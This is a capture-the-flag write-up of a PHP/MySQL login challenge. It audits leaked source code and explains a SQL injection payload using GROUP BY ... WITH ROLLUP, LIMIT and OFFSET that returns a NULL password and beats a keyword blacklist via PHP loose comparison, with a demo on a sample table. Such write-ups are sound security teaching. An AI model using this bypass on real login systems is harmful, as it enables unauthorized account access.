Bypass due to lack of thought (score: 20)
- Source: Pcat
- Difficulty: Medium
- Number of participants: 6479
- Got the flag: 2002
- Number of respondents: 2197
- Pass rate: 91%
Open the problem-solving link to reach the challenge, then answer it. Approach it as you would any web challenge: look at the page source, the requests, the responses and so on. Submitting content that satisfies the challenge returns the flag; submit the correct flag to score. Web challenges mainly test SQL injection, XSS and related knowledge, and cover quite a few directions. This one mainly involves source-code auditing and MySQL knowledge.
Flag Format ctf{}
Problem Solving Links: http://ctf5.shiyanbar.com/web/pcat/index.php
Original title Link: http://www.shiyanbar.com/ctf/1940
"Problem Solving Report"
This is the sixth web challenge I have written up. Opening the link, the page is very plain. As always, the first step is to look at the page source, which is also very simple: a single line. That one line made me curious, though, because it contains a comment mentioning source.txt. Maybe source.txt is the catch. The file might not exist on the server at all, but it costs nothing to try: replace index.php with source.txt in the browser's address bar. Sure enough, the full source of the page is right there!
Let's do an audit of this piece of code.
This part is interesting: every submitted value is run through a blacklist of SQL-injection keywords, and it seems to cover just about all of the usual ones!
Now look at this line, the SQL statement itself. The submitted uname is used directly as the WHERE condition, the database is queried for the matching uname and pwd, and the pwd that comes back is compared with the pwd the user typed in.
If the pwd the user entered equals the pwd from the database, it prints ctf{xxxxxx}; otherwise it prints a failure message.
So what we need is for the user-supplied pwd to equal the pwd returned by the query. How do we arrange that?
We can submit the following injection payload as uname (and leave pwd empty); it has to get past the blacklist, so it is built only from tokens the filter does not match:
' or 1=1 GROUP by PWD with rollup limit 1 offset 2 #
What does this payload do? After substitution the query begins:
SELECT * from interest where uname= '' or 1=1 ...
Piece by piece:
' or 1=1: closes the string and makes the WHERE condition true for every row.
GROUP by PWD with rollup: groups the rows by pwd and appends one extra summary row at the end whose pwd is NULL.
limit 1: return only one row.
offset 2: skip the first two rows, so the single row returned is the third. The rollup row is always the last one, so the offset is chosen to land on it (with two distinct passwords in the table that is offset 2; more distinct passwords would need a larger offset).
#: comments out the rest of the original query, including the trailing quote.
The fetched pwd is therefore NULL, and since PHP's loose == treats NULL and the empty string as equal, the password check succeeds as long as the submitted password is empty.
This is the key to the subject!
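To see the rollup trick outside the challenge, here is an added MySQL demo (not code from the original page or from the challenge itself). The table and column names interest, uname and pwd follow the writeup; the two rows are constructed sample data, and the column id is my own addition for readability.

```sql
-- Constructed throwaway schema; the real challenge table is not known beyond
-- its name (interest) and the two columns the writeup mentions.
CREATE TABLE interest (
    id    INT PRIMARY KEY,
    uname VARCHAR(32),
    pwd   VARCHAR(32)
);
INSERT INTO interest VALUES (1, 'admin', 'hunter2'), (2, 'guest', 'guest');

-- 1. The rollup alone: one row per distinct pwd, then one extra
--    super-aggregate row in which pwd is NULL. That NULL row is always last;
--    its non-grouped columns (id, uname) are indeterminate, so never rely on them.
SELECT * FROM interest WHERE uname = '' OR 1=1 GROUP BY pwd WITH ROLLUP;

-- 2. How many group rows precede the NULL row: the OFFSET in the payload
--    must equal this count for LIMIT 1 OFFSET n to land on the rollup row.
SELECT COUNT(DISTINCT pwd) AS rows_before_rollup FROM interest;

-- 3. The effective query once the payload
--      ' or 1=1 GROUP by PWD with rollup limit 1 offset 2 #
--    is substituted into ... WHERE uname = '<uname>' (the # swallows the
--    application's closing quote, so this is the statement MySQL executes).
--    Exactly one row comes back and its pwd is NULL, which the PHP side then
--    compares with the empty submitted password using loose ==.
SELECT * FROM interest WHERE uname = '' OR 1=1 GROUP BY pwd WITH ROLLUP LIMIT 1 OFFSET 2;
```

One caveat for anyone reproducing this on a current server: with the ONLY_FULL_GROUP_BY mode that MySQL 5.7.5+ enables by default, SELECT * combined with GROUP BY pwd is rejected with error 1055 because id and uname are not functionally dependent on pwd. The challenge ran on a server with a relaxed sql_mode; locally you would have to clear ONLY_FULL_GROUP_BY for the statements above to run.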
CTF Web primer, question 6: Bypass due to lack of thought